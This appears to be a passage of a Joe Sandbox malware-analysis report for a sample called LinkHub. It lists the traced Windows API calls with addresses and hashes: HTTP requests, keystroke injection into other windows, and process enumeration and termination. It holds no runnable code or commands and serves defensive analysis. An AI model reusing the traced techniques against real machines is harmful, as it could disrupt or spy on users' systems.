                                                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00294663
                                                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0029467E
                                                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00294692
                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 002946AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 312131281-0
                                                                                        • Opcode ID: e49db172062362bd8cf2ef43783c977e7249033d0b1e11e3f153cae16c83b0af
                                                                                        • Instruction ID: 1c989241b0180a38f7c38d03b305023c60e21b65153372a9eddcd4c252210a61
                                                                                        • Opcode Fuzzy Hash: e49db172062362bd8cf2ef43783c977e7249033d0b1e11e3f153cae16c83b0af
                                                                                        • Instruction Fuzzy Hash: DA615BB5A10209AFDB10DFA4CC85EEE77B8EF0A710F10015AFA14E72A1D774AD56DB50
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0026BB18
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB2C
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0026BB33
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB42
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0026BB54
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB6D
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BB7F
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BBC4
                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BBD9
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0026ABA8,?,00000001), ref: 0026BBE4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: f901c9377a209ffc682c73f337f5e853c006f3929432b1c37b5b4af38212beed
                                                                                        • Instruction ID: 69c888e9e24d4fbee0f7109ae27c25df7167c7dd06cbe968a7e223cc41cfb8a9
                                                                                        • Opcode Fuzzy Hash: f901c9377a209ffc682c73f337f5e853c006f3929432b1c37b5b4af38212beed
                                                                                        • Instruction Fuzzy Hash: A131BD7A915205AFDB16AF24FCCCF79B7A9AB0535AF108006FE05D71A0C7B49CC08B60
                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002789F2
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278A06
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00278A30
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00278A4A
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278A5C
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00278AA5
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00278AF5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile
                                                                                        • String ID: *.*
                                                                                        • API String ID: 769691225-438819550
                                                                                        • Opcode ID: 33ad4f795b715648ba3d621d65293776b25cf3afbdcabfc9ee208c91d5899e8b
                                                                                        • Instruction ID: d0db051ea92ead3f352f4fb02f27b08edc0dc860303ad8a5f23e3966b25ba67e
                                                                                        • Opcode Fuzzy Hash: 33ad4f795b715648ba3d621d65293776b25cf3afbdcabfc9ee208c91d5899e8b
                                                                                        • Instruction Fuzzy Hash: 9181C172964306DBCB20EF54C448ABAB3E8BF84310F58881AF989D7251DF74D965CB93
                                                                                        APIs
                                                                                        • IsWindow.USER32(00000000), ref: 00298992
                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0029899E
                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00298A79
                                                                                        • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00298AAC
                                                                                        • IsDlgButtonChecked.USER32(?,00000000), ref: 00298AE4
                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00298B06
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00298B1E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                        • String ID: (-
                                                                                        • API String ID: 4072528602-4239615555
                                                                                        • Opcode ID: 1e07340dbbfbe90c38bea106db0416660d90235793e8c3859013ea7e69a3cea3
                                                                                        • Instruction ID: 7b2a40095a024366e126807d4c9da620f64e357a722531e22c86983dd1f99331
                                                                                        • Opcode Fuzzy Hash: 1e07340dbbfbe90c38bea106db0416660d90235793e8c3859013ea7e69a3cea3
                                                                                        • Instruction Fuzzy Hash: AB719F74610206AFEF21DF64C894FBABBB9FF1A300F18045AE845A7361CB31AD64DB51
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 002074D7
                                                                                          • Part of subcall function 00207567: GetClientRect.USER32(?,?), ref: 0020758D
                                                                                          • Part of subcall function 00207567: GetWindowRect.USER32(?,?), ref: 002075CE
                                                                                          • Part of subcall function 00207567: ScreenToClient.USER32(?,?), ref: 002075F6
                                                                                        • GetDC.USER32 ref: 00246083
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00246096
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002460A4
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002460B9
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 002460C1
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00246152
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: cc4b4dd5067b248274e37de75725e02b533a294952cbb8e5c116e7868c17167b
                                                                                        • Instruction ID: a42a6701786e982b416c5bc955f2a2560a4f16619d77b3f6263448bc0a3000c7
                                                                                        • Opcode Fuzzy Hash: cc4b4dd5067b248274e37de75725e02b533a294952cbb8e5c116e7868c17167b
                                                                                        • Instruction Fuzzy Hash: 4A71E330920206DFCF298F64D888AFA7BB5FF46310F14426AED595A2A7C7319C60DF61
                                                                                        APIs
                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0027CCB7
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0027CCDF
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0027CD0F
                                                                                        • GetLastError.KERNEL32 ref: 0027CD67
                                                                                        • SetEvent.KERNEL32(?), ref: 0027CD7B
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0027CD86
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                        • String ID:
                                                                                        • API String ID: 3113390036-3916222277
                                                                                        • Opcode ID: 1e2ad11f30cc7dbfbe739487e9fce7a969d0392141fb38998f98ad1b4fe67cf8
                                                                                        • Instruction ID: ab08b9f24d5467ccf5577e3522fcfff4ac7d0a9fe81fee7778d67358ef236be3
                                                                                        • Opcode Fuzzy Hash: 1e2ad11f30cc7dbfbe739487e9fce7a969d0392141fb38998f98ad1b4fe67cf8
                                                                                        • Instruction Fuzzy Hash: 66317FB1520205AFD731AF75DC89AAB7BFCEF45740B20852EF84A92200DB34ED149B61
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002455AE,?,?,Bad directive syntax error,0029DCD0,00000000,00000010,?,?), ref: 0026A236
                                                                                        • LoadStringW.USER32(00000000,?,002455AE,?), ref: 0026A23D
                                                                                          • Part of subcall function 0020B329: _wcslen.LIBCMT ref: 0020B333
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0026A301
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 858772685-4153970271
                                                                                        • Opcode ID: d462b10745a8445ebf7abb2f2deeb73dc69e21972fba43a5bcaf240d31ad87a2
                                                                                        • Instruction ID: deab0dac1ff73df7753d15f91b43fe00e0b3579b1a010b14d644c4d6a6bd14be
                                                                                        • Opcode Fuzzy Hash: d462b10745a8445ebf7abb2f2deeb73dc69e21972fba43a5bcaf240d31ad87a2
                                                                                        • Instruction Fuzzy Hash: AC21613182035AEBCF11AF90CC0AEEE7B79BF18704F004459B515750A2D7719578EF51
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 002629F8
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00262A0D
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00262A9A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1290815626-3381328864
                                                                                        • Opcode ID: c7b8a8c5ad539ab0a4636dd61f007365a2fe7fb79d4684d03c5963b233031cfe
                                                                                        • Instruction ID: 78a30eb51257a7e01f7fee7363f650079a180f9f65396106ec464bfed0837a82
                                                                                        • Opcode Fuzzy Hash: c7b8a8c5ad539ab0a4636dd61f007365a2fe7fb79d4684d03c5963b233031cfe
                                                                                        • Instruction Fuzzy Hash: A11125766B8B17F9FA247AA0FC0BEA6779C8F15728B200116F904F50D1FBE1ACB45914
                                                                                        APIs
                                                                                        • GetClientRect.USER32(?,?), ref: 0020758D
                                                                                        • GetWindowRect.USER32(?,?), ref: 002075CE
                                                                                        • ScreenToClient.USER32(?,?), ref: 002075F6
                                                                                        • GetClientRect.USER32(?,?), ref: 0020773A
                                                                                        • GetWindowRect.USER32(?,?), ref: 0020775B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Rect$Client$Window$Screen
                                                                                        • String ID:
                                                                                        • API String ID: 1296646539-0
                                                                                        • Opcode ID: 695bf9b8be105b01b58cba5695a5c091c519ef9481136a47f0ffbae4460261f2
                                                                                        • Instruction ID: 4a85167ee0fdddd6e5e7b2901b2500813ccbeb6a5c2ef95ec8ff4f02c10cbfd7
                                                                                        • Opcode Fuzzy Hash: 695bf9b8be105b01b58cba5695a5c091c519ef9481136a47f0ffbae4460261f2
                                                                                        • Instruction Fuzzy Hash: 86C17C7992474AEFDB10CFA8C444BEDBBF5FF08310F14841AE89AA3250D774A960DB61
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                        • String ID:
                                                                                        • API String ID: 1282221369-0
                                                                                        • Opcode ID: f3abaf8c8c4b907eeb82474ced06f6b790913cde6d0539d2b785fb8a11cbf060
                                                                                        • Instruction ID: 6ad7400deccd92d40069c892a84265de321a05299a850f00e78aedbadfe75ce2
                                                                                        • Opcode Fuzzy Hash: f3abaf8c8c4b907eeb82474ced06f6b790913cde6d0539d2b785fb8a11cbf060
                                                                                        • Instruction Fuzzy Hash: EB6128F1E21306AFDB21AF74F885AAE7BA4AF01720F1401AEED45A7242D731DC348B51
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0027CBC7
                                                                                        • GetLastError.KERNEL32 ref: 0027CBDA
                                                                                        • SetEvent.KERNEL32(?), ref: 0027CBEE
                                                                                          • Part of subcall function 0027CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0027CCB7
                                                                                          • Part of subcall function 0027CC98: GetLastError.KERNEL32 ref: 0027CD67
                                                                                          • Part of subcall function 0027CC98: SetEvent.KERNEL32(?), ref: 0027CD7B
                                                                                          • Part of subcall function 0027CC98: InternetCloseHandle.WININET(00000000), ref: 0027CD86
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 337547030-0
                                                                                        • Opcode ID: edc10efaf2335ffa95cbc10e1d584652e505631c45c56a36078dedc6203aa6b1
                                                                                        • Instruction ID: 31176ada92d131b6b942bf0ce7ff78245426b898dedbdf3515b112f2421fe75d
                                                                                        • Opcode Fuzzy Hash: edc10efaf2335ffa95cbc10e1d584652e505631c45c56a36078dedc6203aa6b1
                                                                                        • Instruction Fuzzy Hash: 8E318E71510706AFDB229FB1DD49A6BBBF8FF04304B24852EF95E86610C731E824EB60
                                                                                        APIs
                                                                                          • Part of subcall function 00264393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002643AD
                                                                                          • Part of subcall function 00264393: GetCurrentThreadId.KERNEL32 ref: 002643B4
                                                                                          • Part of subcall function 00264393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00262F00), ref: 002643BB
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00262F0A
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00262F28
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00262F2C
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00262F36
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00262F4E
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00262F52
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00262F5C
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00262F70
                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00262F74
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 19f4e4f159b34f93cd215aca181ed32a51e567a09bff8187fb4d37d0fc6b8bfe
                                                                                        • Instruction ID: 15abe14417b9c16fabebf940a6ccdef76e41aec4690b677d10d40d3015eaa949
                                                                                        • Opcode Fuzzy Hash: 19f4e4f159b34f93cd215aca181ed32a51e567a09bff8187fb4d37d0fc6b8bfe
                                                                                        • Instruction Fuzzy Hash: F301D431794610BBFB106768EC8EF593F5AEB4DB11F200012F358AF1E0C9E264549EA9
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00261D95,?,?,00000000), ref: 00262159
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00261D95,?,?,00000000), ref: 00262160
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00261D95,?,?,00000000), ref: 00262175
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00261D95,?,?,00000000), ref: 0026217D
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00261D95,?,?,00000000), ref: 00262180
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00261D95,?,?,00000000), ref: 00262190
                                                                                        • GetCurrentProcess.KERNEL32(00261D95,00000000,?,00261D95,?,?,00000000), ref: 00262198
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00261D95,?,?,00000000), ref: 0026219B
                                                                                        • CreateThread.KERNEL32(00000000,00000000,002621C1,00000000,00000000,00000000), ref: 002621B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: ee58d3c70257538de259df87f3c6d11b492e6aed4812bee578940e17001f2bd4
                                                                                        • Instruction ID: ff936fb8e945e2bf8a9c4a24b08bcf1a63f2c7f56910de8c3d797c7824abd9e9
                                                                                        • Opcode Fuzzy Hash: ee58d3c70257538de259df87f3c6d11b492e6aed4812bee578940e17001f2bd4
                                                                                        • Instruction Fuzzy Hash: 6F01BBB6240304BFEB10AFA5EC4DF6B7BACEB89711F404452FA09DB1A1CA749804DB24
                                                                                        APIs
                                                                                          • Part of subcall function 002041EA: _wcslen.LIBCMT ref: 002041EF
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0026CF99
                                                                                        • _wcslen.LIBCMT ref: 0026CFE0
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0026D047
                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0026D075
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                        • String ID: ,*-$0$<*-
                                                                                        • API String ID: 1227352736-1368983741
                                                                                        • Opcode ID: 42353a68eb69c1931ec427284fcc8fd64ad7ff37b1d950702159b08073da47bf
                                                                                        • Instruction ID: 08145576a4aea61a404dea57083bf71f17e33a05805ee8cac27286b94b0f012c
                                                                                        • Opcode Fuzzy Hash: 42353a68eb69c1931ec427284fcc8fd64ad7ff37b1d950702159b08073da47bf
                                                                                        • Instruction Fuzzy Hash: 7E511271B34306ABD710AF64D884B7BB7E8AF49314F040A2EF995D3191DBB0CCA58B52
                                                                                        APIs
                                                                                          • Part of subcall function 0026DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0026DDAC
                                                                                          • Part of subcall function 0026DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0026DDBA
                                                                                          • Part of subcall function 0026DD87: CloseHandle.KERNELBASE(00000000), ref: 0026DE87
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0028ABCA
                                                                                        • GetLastError.KERNEL32 ref: 0028ABDD
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0028AC10
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0028ACC5
                                                                                        • GetLastError.KERNEL32(00000000), ref: 0028ACD0
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0028AD21
                                                                                        Strings
                                                                                        Memory Dump Source
